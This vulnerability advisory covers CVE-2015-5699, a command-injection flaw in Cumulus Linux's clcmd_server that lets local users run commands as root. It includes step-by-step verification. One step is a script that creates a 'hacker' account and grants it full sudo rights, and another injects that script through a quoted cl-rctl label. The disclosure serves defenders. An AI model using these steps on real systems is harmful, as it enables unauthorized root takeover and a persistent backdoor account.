Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32403
HistoryAug 24, 2015 - 12:00 a.m.

CVE-2015-5699 - Cumulus Linux's Switch Configuration Tools Backend, clcmd_server, Vulnerable to Local Privilege Escalation

2015-08-2400:00:00
vulners.com
15

Title

Cumulus Linux's Switch Configuration Tools Backend, clcmd_server, Vulnerable to Local Privilege Escalation

Summary

Cumulus Linux's Switch Configuration Tools Backend, clcmd_server, is vulnerable to local privilege escalation via Command Injection. Cumulus Linuxโ€™s clcmd_server, when receiving commands that end in user supplied labels, will execute any other command appended to the end of it whether it is in the Rosetta or not. And it will do so using its own running credentials which are root.

Affected Products

Cumlus Linux 2.5.3 and Earlier

CVE

CVE-2015-5699

Details

Cumulus Linux's Switch Configuration Tools Backend, clcmd_server, is vulnerable to local privilege escalation via Command Injection. Cumulus Linuxโ€™s clcmd_server, when receiving commands that end in user supplied labels, will execute any other command appended to the end of it whether it is in the Rosetta or not. This is because it stops checking the command against the Rosetta when it gets to the label. The label, meta-characters and all, are then passed to the shell for execution. And since clmd_server runs as root it executes both the authorized and the unauthorized command one after the other as root. It is important to note that the second command must begin with a single quote to terminate the command before it and ended with a single quote to close it.

The only limitation to the injection is that it will not work with spaces in the second command. This is because clcmd_server parses the command arguments with spaces. If you put any spaces in your second command, it will see the label as one more command, and fail the operation because it doesn't recognize it. This can easily be overcome by writing a script in your home directory and then calling the script as the second command.

The most potent use of this is a script that creates a root equivalent account. This would allow you, after injection, to su to root-level privileges and take over the system. Since anyone on the system can gain root through this vulnerability, it is considered high impact.

Verification of Vulnerability

The following steps can be carried out in duplicating this vulnerability.

Step 1:
Create the following script in your home directory:

useradd hacker -p $(perl -e'print crypt("hacker", "aa")') -m
echo 'hacker ALL=(ALL:ALL) ALL' | tee --append /etc/sudoers > /dev/null

Step 2:
sudo cl-rctl "ip nht set ospf route-map long';/home/lab/script.sh'"

Step 3:
su hacker

Notes:

  1. clcmd_server is started by root
  2. The user lab was sudo-limited to cl-rctl only

Impact

Unauthorized access. Elevation to root privileges and from there full control of the system.

Credits

Gregory Pickett (@shogun7273), Hellfire Security

Related for SECURITYVULNS:DOC:32403